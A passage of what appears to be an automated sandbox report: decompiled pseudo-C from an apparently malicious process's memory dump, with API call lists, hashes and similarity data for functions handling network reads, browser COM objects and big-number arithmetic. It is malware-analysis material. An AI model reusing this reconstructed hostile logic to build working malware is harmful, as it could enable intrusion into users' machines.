                                                          					 *0x4c0d254 = _t7;
                                                          					if(_t7 == 0) {
                                                          						 *0x4c0d254 =  *0x4c0d254 | 0xffffffff;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				if(_t4 >> 8 > 0) {
                                                          					goto L5;
                                                          				}
                                                          				_t15 = _t4 - _t4;
                                                          				goto L4;
                                                          			}









                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04C0131F,?,?,00000001,?,?,?,04C04EF2,?), ref: 04C03E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04C04EF2,?), ref: 04C03E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04C04EF2,?), ref: 04C03E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04C04EF2,?), ref: 04C03EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04C04EF2,?), ref: 04C03ED8
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 07177ecf45bd4f63f543d237d8ccef6380b3d3c7e973dfacbc7a1bf6dccb5f34
                                                          • Instruction ID: 57f465fc3cfd1543e4c521858c62e221e5344017cde7339a6ec14dad50c50e65
                                                          • Opcode Fuzzy Hash: 07177ecf45bd4f63f543d237d8ccef6380b3d3c7e973dfacbc7a1bf6dccb5f34
                                                          • Instruction Fuzzy Hash: 9CF0C278750382ABEB259F74A809B293B62E780705F028716F953CA1E0E778EDC1CF15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 04C0395A
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C03A3F
                                                            • Part of subcall function 04C06F3A: SysAllocString.OLEAUT32(04C0C290), ref: 04C06F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04C03A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C03AA1
                                                            • Part of subcall function 04C01AE2: Sleep.KERNEL32(000001F4), ref: 04C01B2A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                          • String ID:
                                                          • API String ID: 3193056040-0
                                                          • Opcode ID: 9459c08a914a24b8646a042ac3928d4c9b4456979b8fb17d1fcb9fa953ac56bd
                                                          • Instruction ID: a508567ed902e9c3594cb3f6944bb1adedd181646f70aedd4159cfc052199a48
                                                          • Opcode Fuzzy Hash: 9459c08a914a24b8646a042ac3928d4c9b4456979b8fb17d1fcb9fa953ac56bd
                                                          • Instruction Fuzzy Hash: D7519135500649EFDB01CFE8C844A9EB7BAFF88704F258469E905DB260EB35EE45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 46%
                                                          			E04C06F3A(intOrPtr* __eax) {
                                                          				void* _v8;
                                                          				WCHAR* _v12;
                                                          				void* _v16;
                                                          				char _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v32;
                                                          				intOrPtr _v40;
                                                          				short _v48;
                                                          				intOrPtr _v56;
                                                          				short _v64;
                                                          				intOrPtr* _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr* _t58;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				short _t67;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t87;
                                                          				intOrPtr _t103;
                                                          				intOrPtr _t109;
                                                          				void* _t118;
                                                          				void* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t130;
                                                          
                                                          				_t123 = _t122 - 0x3c;
                                                          				_push( &_v8);
                                                          				_push(__eax);
                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                          				if(_t118 >= 0) {
                                                          					_t54 = _v8;
                                                          					_t103 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					_t5 = _t103 + 0x4c0e038; // 0x3050f485
                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                          					_t56 = _v8;
                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                          					if(_t118 >= 0) {
                                                          						__imp__#2(0x4c0c290);
                                                          						_v28 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_t118 = 0x8007000e;
                                                          						} else {
                                                          							_t60 = _v32;
                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                          							_t87 = __imp__#6;
                                                          							_t118 = _t61;
                                                          							if(_t118 >= 0) {
                                                          								_t63 = _v24;
                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                          								if(_t118 >= 0) {
                                                          									_t130 = _v20;
                                                          									if(_t130 != 0) {
                                                          										_t67 = 3;
                                                          										_v64 = _t67;
                                                          										_v48 = _t67;
                                                          										_v56 = 0;
                                                          										_v40 = 0;
                                                          										if(_t130 > 0) {
                                                          											while(1) {
                                                          												_t68 = _v24;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t123 = _t123;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                          												if(_t118 < 0) {
                                                          													goto L16;
                                                          												}
                                                          												_t70 = _v8;
                                                          												_t109 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          												_t28 = _t109 + 0x4c0e0bc; // 0x3050f1ff
                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                          												if(_t118 >= 0) {
                                                          													_t75 = _v16;
                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                          														_t79 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          														_t33 = _t79 + 0x4c0e078; // 0x76006f
                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                          															_t83 = _v16;
                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                          														}
                                                          														 *_t87(_v12);
                                                          													}
                                                          													_t77 = _v16;
                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                          												}
                                                          												_t72 = _v8;
                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                          												_v40 = _v40 + 1;
                                                          												if(_v40 < _v20) {
                                                          													continue;
                                                          												}
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								L16:
                                                          								_t65 = _v24;
                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          							}
                                                          							 *_t87(_v28);
                                                          						}
                                                          						_t58 = _v32;
                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                          					}
                                                          				}
                                                          				return _t118;
                                                          			}





































                                                          APIs
                                                          • SysAllocString.OLEAUT32(04C0C290), ref: 04C06F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04C0706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C07084
                                                          • SysFreeString.OLEAUT32(?), ref: 04C070B3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: c1d4810e4bf7926143d2ee1952f80093acf1217502e8f168f20884a15e6fc72a
                                                          • Instruction ID: baaebe5008f8afce39afdf33f660db0382207c2308369ef099944d1450e131db
                                                          • Opcode Fuzzy Hash: c1d4810e4bf7926143d2ee1952f80093acf1217502e8f168f20884a15e6fc72a
                                                          • Instruction Fuzzy Hash: 20514175D00519EFCB04DFE8C488DAEF7B6EF88704B158695E915EB250D731AE41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E04C053C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				void _v92;
                                                          				void _v236;
                                                          				void* _t55;
                                                          				unsigned int _t56;
                                                          				signed int _t66;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				signed int _t79;
                                                          				void* _t81;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				signed int* _t99;
                                                          				signed int _t101;
                                                          				signed int _t103;
                                                          				void* _t107;
                                                          
                                                          				_t92 = _a12;
                                                          				_t101 = __eax;
                                                          				_t55 = E04C01AD1(_a16, _t92);
                                                          				_t79 = _t55;
                                                          				if(_t79 == 0) {
                                                          					L18:
                                                          					return _t55;
                                                          				}
                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                          				_t81 = 0;
                                                          				_t96 = 0x20;
                                                          				if(_t56 == 0) {
                                                          					L4:
                                                          					_t97 = _t96 - _t81;
                                                          					_v12 = _t96 - _t81;
                                                          					E04C050FF(_t79,  &_v236);
                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04C05745(_t101,  &_v236, _a8, _t96 - _t81);
                                                          					E04C05745(_t79,  &_v92, _a12, _t97);
                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                          					_t66 = E04C050FF(_t101, 0x4c0d1b0);
                                                          					_t103 = _t101 - _t79;
                                                          					_a8 = _t103;
                                                          					if(_t103 < 0) {
                                                          						L17:
                                                          						E04C050FF(_a16, _a4);
                                                          						E04C05088(_t79,  &_v236, _a4, _t97);
                                                          						memset( &_v236, 0, 0x8c);
                                                          						_t55 = memset( &_v92, 0, 0x44);
                                                          						goto L18;
                                                          					}
                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                          					do {
                                                          						if(_v8 != 0xffffffff) {
                                                          							_push(1);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push( *_t99);
                                                          							L04C0AF2E();
                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                          							asm("adc edx, esi");
                                                          							_push(0);
                                                          							_push(_v8 + 1);
                                                          							_push(_t92);
                                                          							_push(_t74);
                                                          							L04C0AF28();
                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                          								_t74 = _t74 | 0xffffffff;
                                                          								_v16 = _v16 & 0x00000000;
                                                          							}
                                                          						} else {
                                                          							_t74 =  *_t99;
                                                          						}
                                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                          						_a12 = _t74;
                                                          						_t76 = E04C05F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                          						while(1) {
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							L13:
                                                          							_t92 =  &_v92;
                                                          							if(E04C090C2(_t79, _t92, _t106) < 0) {
                                                          								break;
                                                          							}
                                                          							L14:
                                                          							_a12 = _a12 + 1;
                                                          							_t76 = E04C06044(_t79,  &_v92, _t106, _t106);
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						_a8 = _a8 - 1;
                                                          						_t66 = _a12;
                                                          						_t99 = _t99 - 4;
                                                          						 *(0x4c0d1b0 + _a8 * 4) = _t66;
                                                          					} while (_a8 >= 0);
                                                          					_t97 = _v12;
                                                          					goto L17;
                                                          				}
                                                          				while(_t81 < _t96) {
                                                          					_t81 = _t81 + 1;
                                                          					_t56 = _t56 >> 1;
                                                          					if(_t56 != 0) {
                                                          						continue;
                                                          					}
                                                          					goto L4;
                                                          				}
                                                          				goto L4;
                                                          			}






















                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04C05473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04C05489
                                                          • memset.NTDLL ref: 04C05529
                                                          • memset.NTDLL ref: 04C05539
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 580e0ef4a0607603ef7af19c5052f40b3b95e9afb3cd6c6e98e8d7d0fa289742
                                                          • Instruction ID: 9e659b1772e92a5627bc021d3377131b28455e6f133eaa1b9765555959a2ee85
                                                          • Opcode Fuzzy Hash: 580e0ef4a0607603ef7af19c5052f40b3b95e9afb3cd6c6e98e8d7d0fa289742
                                                          • Instruction Fuzzy Hash: AE414071A00219BBEB10DFA8CC44BDE776AEF44714F10C529B91AA71C0DB71BA55DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 04C0A82E
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • ResetEvent.KERNEL32(?), ref: 04C0A8A2
                                                          • GetLastError.KERNEL32 ref: 04C0A8C5
                                                          • GetLastError.KERNEL32 ref: 04C0A970
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: 86dd1f73f2b34dcc75fb277d4cde05c1666357a1e16d2a4a07bcc69bd1864806
                                                          • Instruction ID: 18fd0f0edacc5080035fe00a66c842318b3d7824af352d7982bf7f91c04ecdbf
                                                          • Opcode Fuzzy Hash: 86dd1f73f2b34dcc75fb277d4cde05c1666357a1e16d2a4a07bcc69bd1864806
                                                          • Instruction Fuzzy Hash: 1E418275600704BFD7319FA5DC48E6F7BBEEB95704B118A29F543D1090E732AA85DB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 42%
                                                          			E04C015FF(void* __eax, void* __ecx) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				intOrPtr _v16;
                                                          				char _v20;
                                                          				void* __esi;
                                                          				void* _t30;
                                                          				intOrPtr _t38;
                                                          				intOrPtr* _t39;
                                                          				intOrPtr* _t41;
                                                          				void* _t54;
                                                          				long _t64;
                                                          				void* _t67;
                                                          				void* _t69;
                                                          
                                                          				_t58 = __ecx;
                                                          				_t67 = __eax;
                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                          					L2:
                                                          					_t30 = _t67;
                                                          					_pop(_t68);
                                                          					_t69 = _t30;
                                                          					_t64 = 0;
                                                          					ResetEvent( *(_t69 + 0x1c));
                                                          					_push( &_v8);
                                                          					_push(4);
                                                          					_push( &_v20);
                                                          					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          					if( *0x4c0d134() != 0) {
                                                          						L9:
                                                          						if(_v8 == 0) {
                                                          							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                          						} else {
                                                          							 *0x4c0d164(0, 1,  &_v12);
                                                          							if(0 != 0) {
                                                          								_t64 = 8;
                                                          							} else {
                                                          								_t38 = E04C0A71F(0x1000);
                                                          								_v16 = _t38;
                                                          								if(_t38 == 0) {
                                                          									_t64 = 8;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(_v8);
                                                          									_push( &_v20);
                                                          									while(1) {
                                                          										_t41 = _v12;
                                                          										_t61 =  *_t41;
                                                          										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                          										ResetEvent( *(_t69 + 0x1c));
                                                          										_push( &_v8);
                                                          										_push(0x1000);
                                                          										_push(_v16);
                                                          										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          										if( *0x4c0d134() != 0) {
                                                          											goto L17;
                                                          										}
                                                          										_t64 = GetLastError();
                                                          										if(_t64 == 0x3e5) {
                                                          											_t64 = E04C05646( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                          											if(_t64 == 0) {
                                                          												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          												if(_t64 == 0) {
                                                          													goto L17;
                                                          												}
                                                          											}
                                                          										}
                                                          										L19:
                                                          										E04C0A734(_v16);
                                                          										if(_t64 == 0) {
                                                          											_t64 = E04C070CC(_v12, _t69);
                                                          										}
                                                          										goto L22;
                                                          										L17:
                                                          										_t64 = 0;
                                                          										if(_v8 != 0) {
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											_push(_v16);
                                                          											continue;
                                                          										}
                                                          										goto L19;
                                                          									}
                                                          								}
                                                          								L22:
                                                          								_t39 = _v12;
                                                          								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t64 = GetLastError();
                                                          						if(_t64 != 0x3e5) {
                                                          							L8:
                                                          							if(_t64 == 0) {
                                                          								goto L9;
                                                          							}
                                                          						} else {
                                                          							_t64 = E04C05646( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                          							if(_t64 == 0) {
                                                          								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					return _t64;
                                                          				} else {
                                                          					_t54 = E04C09242(__ecx, __eax);
                                                          					if(_t54 != 0) {
                                                          						return _t54;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          			}
















                                                          0x04c019bb
                                                          0x04c019c0
                                                          0x00000000
                                                          0x00000000
                                                          0x04c019c0
                                                          0x04c019b9
                                                          0x04c019d2
                                                          0x04c019d5
                                                          0x04c019dc
                                                          0x04c019e7
                                                          0x04c019e7
                                                          0x00000000
                                                          0x04c019c2
                                                          0x04c019c2
                                                          0x04c019c7
                                                          0x04c019c9
                                                          0x04c019ca
                                                          0x04c019cd
                                                          0x00000000
                                                          0x04c019cd
                                                          0x00000000
                                                          0x04c019c7
                                                          0x04c01974
                                                          0x04c019ee
                                                          0x04c019ee
                                                          0x04c019f4
                                                          0x04c019f4
                                                          0x04c01950
                                                          0x04c01907
                                                          0x04c0190d
                                                          0x04c01915
                                                          0x04c0192e
                                                          0x04c01930
                                                          0x00000000
                                                          0x00000000
                                                          0x04c01917
                                                          0x04c01921
                                                          0x04c01925
                                                          0x04c0192b
                                                          0x00000000
                                                          0x04c0192b
                                                          0x04c01925
                                                          0x04c01915
                                                          0x04c01a07
                                                          0x04c01608
                                                          0x04c01608
                                                          0x04c0160f
                                                          0x04c0161a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c0160f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 04C018EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 04C01907
                                                          • ResetEvent.KERNEL32(?), ref: 04C01980
                                                          • GetLastError.KERNEL32 ref: 04C0199B
                                                            • Part of subcall function 04C09242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04C09259
                                                            • Part of subcall function 04C09242: SetEvent.KERNEL32(?), ref: 04C09269
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 4c30a284a76414e07d391d7fe788443890f11e4c31282c1f24ab743bae1321c8
                                                          • Instruction ID: 33c38d1c9a576411eb9044b1876521d1555aea49080fcf77644cad2094eb96a1
                                                          • Opcode Fuzzy Hash: 4c30a284a76414e07d391d7fe788443890f11e4c31282c1f24ab743bae1321c8
                                                          • Instruction Fuzzy Hash: 0441C736600604ABDB219FA5CC44BAEB7BBEF44365F198528E551D71D0EE32FA419B10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 04C03B0D
                                                          • SysAllocString.OLEAUT32(04C085ED), ref: 04C03B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C03B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C03B73
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 511fe9e2c3008c094189d55455adf0874698df3bcbb26fdbfdd7f82a69d21683
                                                          • Instruction ID: ce0969a468024020a24454029e7cb820af1663685bf8fd354dd12246459f0bca
                                                          • Opcode Fuzzy Hash: 511fe9e2c3008c094189d55455adf0874698df3bcbb26fdbfdd7f82a69d21683
                                                          • Instruction Fuzzy Hash: 7F311E76900249EFCB04DF99D8C49AE7BB9FF48304B11842EF906D7261D734AA81CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E04C011EE(signed int _a4, signed int* _a8) {
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				signed int _t6;
                                                          				intOrPtr _t8;
                                                          				intOrPtr _t12;
                                                          				short* _t19;
                                                          				void* _t25;
                                                          				signed int* _t28;
                                                          				CHAR* _t30;
                                                          				long _t31;
                                                          				intOrPtr* _t32;
                                                          
                                                          				_t6 =  *0x4c0d270; // 0xd448b889
                                                          				_t32 = _a4;
                                                          				_a4 = _t6 ^ 0x109a6410;
                                                          				_t8 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          				_t3 = _t8 + 0x4c0e87e; // 0x61636f4c
                                                          				_t25 = 0;
                                                          				_t30 = E04C038A8(_t3, 1);
                                                          				if(_t30 != 0) {
                                                          					_t25 = CreateEventA(0x4c0d2ac, 1, 0, _t30);
                                                          					E04C0A734(_t30);
                                                          				}
                                                          				_t12 =  *0x4c0d25c; // 0x4000000a
                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04C0A65C() != 0) {
                                                          					L12:
                                                          					_t28 = _a8;
                                                          					if(_t28 != 0) {
                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                          					}
                                                          					_t31 = E04C08EA1(_t32, 0);
                                                          					if(_t31 == 0 && _t25 != 0) {
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          					}
                                                          					if(_t28 != 0 && _t31 != 0) {
                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                          					}
                                                          					goto L20;
                                                          				} else {
                                                          					_t19 =  *0x4c0d10c( *_t32, 0x20);
                                                          					if(_t19 != 0) {
                                                          						 *_t19 = 0;
                                                          						_t19 = _t19 + 2;
                                                          					}
                                                          					_t31 = E04C0A273(0,  *_t32, _t19, 0);
                                                          					if(_t31 == 0) {
                                                          						if(_t25 == 0) {
                                                          							L22:
                                                          							return _t31;
                                                          						}
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          						if(_t31 == 0) {
                                                          							L20:
                                                          							if(_t25 != 0) {
                                                          								CloseHandle(_t25);
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          			}















                                                          APIs
                                                            • Part of subcall function 04C038A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,06889A98,00000000,?,?,63699BC3,00000005,04C0D00C,?,?,04C05D30), ref: 04C038DE
                                                            • Part of subcall function 04C038A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04C03902
                                                            • Part of subcall function 04C038A8: lstrcat.KERNEL32(00000000,00000000), ref: 04C0390A
                                                          • CreateEventA.KERNEL32(04C0D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04C03760,?,00000001,?), ref: 04C0122F
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04C03760,00000000,00000000,?,00000000,?,04C03760,?,00000001,?,?,?,?,04C052AA), ref: 04C0128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04C03760,?,00000001,?), ref: 04C012BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04C03760,?,00000001,?,?,?,?,04C052AA), ref: 04C012D5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: 65d1513e8cb3f901dcba7329dd4452689d6d96d182400ede4f083a6d62aba6e9
                                                          • Instruction ID: 639198a00d8ba82f8fa5faf55286eb56a01eb4e79c4178dcfa3786579125660d
                                                          • Opcode Fuzzy Hash: 65d1513e8cb3f901dcba7329dd4452689d6d96d182400ede4f083a6d62aba6e9
                                                          • Instruction Fuzzy Hash: 9A21E4326103105BDB315AAD9C44B7BB3ABFB89714F0A8625F906D71C0DF66EE408694
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E04C09242(void* __ecx, void* __esi) {
                                                          				char _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				long _v20;
                                                          				long _t34;
                                                          				long _t39;
                                                          				long _t42;
                                                          				long _t56;
                                                          				intOrPtr _t58;
                                                          				void* _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t61 = __esi;
                                                          				_t59 = __ecx;
                                                          				_t60 =  *0x4c0d13c; // 0x4c0abf1
                                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                          				do {
                                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
